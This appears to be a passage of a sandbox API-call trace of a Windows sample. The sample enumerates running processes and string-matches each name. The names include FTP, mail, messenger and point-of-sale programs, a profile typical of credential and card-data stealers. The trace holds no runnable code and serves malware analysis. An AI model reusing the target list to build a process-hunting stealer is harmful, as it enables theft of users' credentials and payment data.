[0096.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x35772e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0096.436] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0096.436] StrStrIA (lpFirst="filezilla.exe", lpSrch="excel") returned 0x0 [0096.436] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0096.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.442] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3577300 [0096.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x3577300, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0096.442] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0096.442] StrStrIA (lpFirst="flashfxp.exe", lpSrch="excel") returned 0x0 [0096.442] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0096.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.443] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3577348 [0096.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x3577348, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0096.443] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0096.443] StrStrIA (lpFirst="fling.exe", lpSrch="excel") returned 0x0 [0096.443] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0096.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0096.444] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3575460 [0096.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x3575460, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0096.444] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0096.444] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="excel") returned 0x0 [0096.444] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0096.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0096.445] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35750c0 [0096.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x35750c0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0096.445] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0096.445] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="excel") returned 0x0 [0096.445] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0096.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0096.446] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574e50 [0096.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x3574e50, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0096.446] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0096.446] StrStrIA (lpFirst="icq.exe", lpSrch="excel") returned 0x0 [0096.446] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0096.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.447] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3577618 [0096.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x3577618, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0096.447] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0096.447] StrStrIA (lpFirst="leechftp.exe", lpSrch="excel") returned 0x0 [0096.447] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0096.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.448] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3577870 [0096.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x3577870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0096.448] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0096.448] StrStrIA (lpFirst="ncftp.exe", lpSrch="excel") returned 0x0 [0096.448] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0096.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.449] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577660 [0096.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x3577660, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0096.449] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0096.449] StrStrIA (lpFirst="notepad.exe", lpSrch="excel") returned 0x0 [0096.449] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0096.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.450] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35775e8 [0096.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x35775e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0096.450] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0096.450] StrStrIA (lpFirst="operamail.exe", lpSrch="excel") returned 0x0 [0096.450] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0096.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.452] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35777c8 [0096.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x35777c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outlook.exe", lpUsedDefaultChar=0x0) returned 12 [0096.452] lstrcpyA (in: lpString1=0x567fabc, lpString2="outlook.exe" | out: lpString1="outlook.exe") returned="outlook.exe" [0096.452] StrStrIA (lpFirst="outlook.exe", lpSrch="excel") returned 0x0 [0096.452] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0096.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.453] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3577750 [0096.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x3577750, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0096.453] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0096.453] StrStrIA (lpFirst="pidgin.exe", lpSrch="excel") returned 0x0 [0096.453] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0096.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.454] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3577810 [0096.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x3577810, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0096.454] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0096.454] StrStrIA (lpFirst="scriptftp.exe", lpSrch="excel") returned 0x0 [0096.454] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0096.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.455] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3577828 [0096.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x3577828, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0096.455] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0096.455] StrStrIA (lpFirst="skype.exe", lpSrch="excel") returned 0x0 [0096.455] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0096.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.456] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3577648 [0096.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x3577648, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0096.456] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0096.456] StrStrIA (lpFirst="smartftp.exe", lpSrch="excel") returned 0x0 [0096.456] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0096.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0096.457] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3577888 [0096.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x3577888, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 16 [0096.457] lstrcpyA (in: lpString1=0x567fabc, lpString2="thunderbird.exe" | out: lpString1="thunderbird.exe") returned="thunderbird.exe" [0096.457] StrStrIA (lpFirst="thunderbird.exe", lpSrch="excel") returned 0x0 [0096.457] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0096.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.458] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3577780 [0096.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x3577780, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0096.458] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0096.458] StrStrIA (lpFirst="totalcmd.exe", lpSrch="excel") returned 0x0 [0096.458] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0096.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.459] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3577720 [0096.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x3577720, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0096.459] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0096.459] StrStrIA (lpFirst="trillian.exe", lpSrch="excel") returned 0x0 [0096.459] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0096.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.460] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35777e0 [0096.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x35777e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0096.461] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0096.461] StrStrIA (lpFirst="webdrive.exe", lpSrch="excel") returned 0x0 [0096.461] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0096.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.462] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3577678 [0096.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x3577678, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0096.462] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0096.462] StrStrIA (lpFirst="whatsapp.exe", lpSrch="excel") returned 0x0 [0096.462] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0096.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.463] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3577798 [0096.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x3577798, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0096.463] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0096.463] StrStrIA (lpFirst="winscp.exe", lpSrch="excel") returned 0x0 [0096.463] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0096.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0096.464] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3575320 [0096.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x3575320, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0096.464] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0096.464] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="excel") returned 0x0 [0096.464] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0096.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0096.465] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3575340 [0096.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x3575340, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0096.465] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0096.465] StrStrIA (lpFirst="active-charge.exe", lpSrch="excel") returned 0x0 [0096.465] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0096.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.466] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35775b8 [0096.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x35775b8, cbMultiByte=12, lpDefaultChar=0x0, 